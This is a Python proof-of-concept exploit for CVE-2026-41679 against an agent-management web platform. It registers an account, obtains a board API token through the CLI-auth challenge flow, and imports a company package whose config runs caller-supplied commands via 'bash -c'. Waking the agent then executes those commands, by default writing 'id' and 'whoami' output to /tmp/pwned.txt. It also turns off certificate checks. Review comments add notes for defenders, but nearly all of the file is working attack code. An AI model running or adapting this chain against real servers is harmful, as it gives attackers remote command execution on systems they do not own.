import argparse
import requests
import urllib3
# Silence urllib3's InsecureRequestWarning, which would otherwise be emitted on
# every request in this file because certificate verification is turned off.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Passed as verify= to every requests.post() call below. With False the server
# certificate is not validated, so the session cookie and API token handled by
# this script are exposed to anyone able to intercept the connection.
# NOTE(review): presumably set for lab instances with self-signed certificates;
# set it to True (or a CA bundle path) when the endpoint has a valid certificate.
VERIFY = False
def signup(target, name, email, password):
    """Register an account through the email sign-up endpoint.

    Sends ``name``, ``email`` and ``password`` as JSON to
    ``{target}/api/auth/sign-up/email``. Status 200 and 422 are both treated
    as success; any other status raises ``Exception`` carrying the status
    code and response body. Nothing is returned.

    NOTE(review): 422 is presumably what the server answers when the account
    already exists, which would let the script be re-run -- confirm against
    the API. For defenders, the fact that this step succeeds at all means the
    instance allows self-registration, which the rest of the chain relies on.
    """
    response = requests.post(
        f"{target}/api/auth/sign-up/email",
        headers={"Content-Type": "application/json"},
        json={"email": email, "password": password, "name": name},
        verify=VERIFY,
    )
    if response.status_code not in (200, 422):
        raise Exception(
            f"Couldnot create account, status: {response.status_code} - {response.text}."
        )
def signin(target, email, password):
    """Log in with email and password and return the session cookie pair.

    Posts the credentials to ``{target}/api/auth/sign-in/email`` and returns
    the text before the first ``;`` of the ``Set-Cookie`` response header
    (the ``name=value`` part, without attributes).

    Raises:
        Exception: if the response carries no ``Set-Cookie`` header.

    NOTE(review): when a server sets several cookies, ``requests`` exposes
    them as one comma-joined header value, so only the first cookie is kept
    here.
    """
    response = requests.post(
        f"{target}/api/auth/sign-in/email",
        headers={"Content-Type": "application/json"},
        json={"email": email, "password": password},
        verify=VERIFY,
    )
    raw_cookie = response.headers.get("Set-Cookie")
    if raw_cookie is None:
        raise Exception(
            f"Failed to login, status: {response.status_code} - {response.text}."
        )
    # Drop cookie attributes (Path, HttpOnly, ...) and keep only name=value.
    name_value, _, _ = raw_cookie.partition(";")
    return name_value
def create_challenge(target):
    """Create a CLI-auth challenge and return ``(id, token, boardApiToken)``.

    Posts ``{"command": "test"}`` to ``{target}/api/cli-auth/challenges``.
    The request carries no cookie or Authorization header, and the script
    expects the JSON response to already contain the board API token that
    later requests use as a bearer credential.

    Raises:
        Exception: if any of ``id``, ``token`` or ``boardApiToken`` is missing
            from the response.

    For defenders: challenge creation followed shortly by an approval of the
    same challenge id from a freshly registered account is the pattern this
    script produces in request logs.
    """
    response = requests.post(
        f"{target}/api/cli-auth/challenges",
        headers={"Content-Type": "application/json"},
        json={"command": "test"},
        verify=VERIFY,
    )
    payload = response.json()
    wanted = ("id", "token", "boardApiToken")
    if any(field not in payload for field in wanted):
        raise Exception(
            f"Couldn't create challenge, status: {response.status_code} - {response.text}."
        )
    return tuple(payload[field] for field in wanted)
def approve_challenge(target, id, token, session_cookie):
    """Approve a CLI-auth challenge using the signed-in user's session.

    Posts ``{"token": token}`` to
    ``{target}/api/cli-auth/challenges/{id}/approve`` with the session cookie
    and an ``Origin`` header equal to ``target``. Returns nothing.

    NOTE(review): the response body is parsed as JSON but neither it nor the
    status code is checked (the original only left a "validations"
    placeholder). A server that rejects the approval is therefore noticed
    only when a later step fails; the sole failure raised here is a non-JSON
    body. On a fixed deployment this is the request one would expect to be
    refused for an ordinary self-registered account -- confirm against the
    advisory.
    """
    request_headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/json",
        "Origin": target,
    }
    response = requests.post(
        f"{target}/api/cli-auth/challenges/{id}/approve",
        headers=request_headers,
        json={"token": token},
        verify=VERIFY,
    )
    # Parsed only for its side effect of failing on a non-JSON body.
    response.json()
def import_company(target, board_api_token, commands):
    """Import an inline company package and return the first agent's id.

    Posts to ``{target}/api/companies/import`` with ``board_api_token`` as a
    bearer token. The inline package holds three files: ``COMPANY.md``,
    ``agents/pwn/AGENTS.md`` and ``.paperclip.yaml``. The last one configures
    the agent with adapter type ``process``, command ``bash`` and ``commands``
    interpolated as the ``-c`` argument, so the caller-supplied string ends up
    in the server-side agent configuration.

    Raises:
        Exception: if the response lists no agents, or the first agent has no
            ``id``.

    For defenders: an import request whose inline files declare a ``process``
    adapter is the step that places an operator-chosen command on the server;
    it is the request to alert on and the capability to restrict.
    """
    package_files = {
        "COMPANY.md": "---\nname: attacker-corp\nslug: attacker-corp\n---\nx",
        "agents/pwn/AGENTS.md": "---\nkind: agent\nname: pwn\nslug: pwn\nrole: engineer\n---\nx",
        ".paperclip.yaml": f"agents:\n pwn:\n icon: terminal\n adapter:\n type: process\n config:\n command: bash\n args:\n - -c\n - {commands}"
    }
    body = {
        "source": {"type": "inline", "files": package_files},
        "target": {"mode": "new_company", "newCompanyName": "attacker-corp"},
        "include": {"company": True, "agents": True},
        "agents": "all",
    }
    request_headers = {
        "Content-Type": "application/json",
        "Origin": target,
        "Authorization": f"Bearer {board_api_token}",
    }
    response = requests.post(
        f"{target}/api/companies/import",
        headers=request_headers,
        json=body,
        verify=VERIFY,
    )
    payload = response.json()
    if "agents" not in payload or len(payload["agents"]) == 0:
        raise Exception(
            f"No agents created, status: {response.status_code} - {response.text}."
        )
    first_agent = payload["agents"][0]
    if "id" not in first_agent:
        raise Exception(
            f"Found agent doesn't have an id, status: {response.status_code} - {response.text}."
        )
    return first_agent["id"]
def trigger_agent(target, board_api_token, agent_id):
    """Send a wakeup request for an agent and return ``(id, status)``.

    Posts an empty JSON object to ``{target}/api/agents/{agent_id}/wakeup``
    with ``board_api_token`` as a bearer token.

    Raises:
        Exception: if the response lacks ``id`` or ``status``.

    NOTE(review): the returned values only show that the server accepted the
    wakeup; nothing here observes whether the agent's configured process
    actually ran.
    """
    request_headers = {
        "Content-Type": "application/json",
        "Origin": target,
        "Authorization": f"Bearer {board_api_token}",
    }
    response = requests.post(
        f"{target}/api/agents/{agent_id}/wakeup",
        headers=request_headers,
        verify=VERIFY,
        json={},
    )
    payload = response.json()
    has_both = "status" in payload and "id" in payload
    if not has_both:
        raise Exception(
            f"Error triggering agent, no id or status returned, status: {response.status_code} - {response.text}."
        )
    return payload["id"], payload["status"]
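if __name__ == "__main__":
    # Command-line entry point: parse the options, then run the request chain
    # signup -> signin -> create_challenge -> approve_challenge ->
    # import_company -> trigger_agent against the given endpoint. Any
    # exception raised by a step is printed and ends the run.
    parser = argparse.ArgumentParser(description="This is a POC of CVE-2026-41679.")
    parser.add_argument(
        "-t", help="The endpoint of the target to check.", dest="target", required=True
    )
    parser.add_argument("-n", help="The name to use.", dest="name", default="attacker")
    # NOTE(review): this default is e-mail obfuscation residue from the page
    # the script was copied from, not a usable address.
    parser.add_argument(
        "-e", help="The email-adress to use.", dest="email", default="[email protected]"
    )
    parser.add_argument(
        "-p", help="The password to use.", dest="password", default="P@sswOrd123!"
    )
    parser.add_argument(
        "-c", help="The commands to use.", dest="commands", default="id > /tmp/pwned.txt && whoami >> /tmp/pwned.txt"
    )
    args = parser.parse_args()
    try:
        signup(args.target, args.name, args.email, args.password)
        session_cookie = signin(args.target, args.email, args.password)
        challenge_id, token, board_api_token = create_challenge(args.target)
        approve_challenge(args.target, challenge_id, token, session_cookie)
        agent_id = import_company(args.target, board_api_token, args.commands)
        # Named wakeup_id rather than id so the builtin id() is not rebound at
        # module level.
        wakeup_id, status = trigger_agent(args.target, board_api_token, agent_id)
        # The script only sees that the wakeup was accepted; it never observes
        # the process running. Report exactly that, including the status the
        # server returned, so the result is not read as confirmed execution.
        print(
            f"Likely vulnerable: agent wakeup was accepted (id: {wakeup_id}, "
            f"status: {status}). Command execution is not verified by this script."
        )
    except Exception as ex:
        print(str(ex))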